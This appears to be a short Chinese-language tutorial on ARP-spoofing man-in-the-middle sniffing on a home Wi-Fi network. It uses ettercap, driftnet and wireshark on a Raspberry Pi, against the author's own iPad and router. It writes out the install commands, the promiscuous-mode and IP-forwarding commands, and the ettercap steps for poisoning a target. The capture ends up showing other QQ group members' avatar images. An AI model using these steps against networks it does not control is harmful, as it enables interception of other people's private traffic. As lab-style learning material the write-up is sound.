准备
1.操作系统:树莓派OS(因为我的虚拟机的无线网卡找不到,所以暂时用的我树莓派下的系统)
2.安装ettercap和wireshark
sudo apt-get install wireshark
sudo apt-get install ettercap-text-only
sudo apt-get install ettercap-graphical
3.输入iwconfig查看自己的无线网卡
wlan0即为无线网卡
正式开始
1.将无线网卡设为混杂模数(这样就能抓到所有的包)
sudo ifconfig wlan0 promisc
2.输入echo 1 > /proc/sys/net/ipv4/ip_forward 进行转发,确保我的实验机器可以正常上网(若提示权限不够,则输入 su 进入root下实验)
3.启动ettercap
(1).输入sudo ettercap -G 启动
(2)点击Sniff(选择Unified sniffing),选择上述我们提到的无线网卡wlan0
(3)选择Hosts中的scan扫描局域网中的主机
(4)然后选择Hosts中的list查看扫描到的主机
其中192.168.1.100为我的ipad的地址,也是接下来演示所用的机器
(5)分别将192.168.1.1和192.168.1.100添加到Target1和Target2中
(6)进行ARP嗅探
开始嗅探
4.重新开启一个终端 输入driftnet -i wlan0 获取图片
5.此时再开启一个终端打开wireshark
点击第一块无线网卡wlan0进行抓包
我用我的ipad进入一个QQ群
可以看到抓包成功(上述展示的是各位群友的头像哈哈哈哈哈)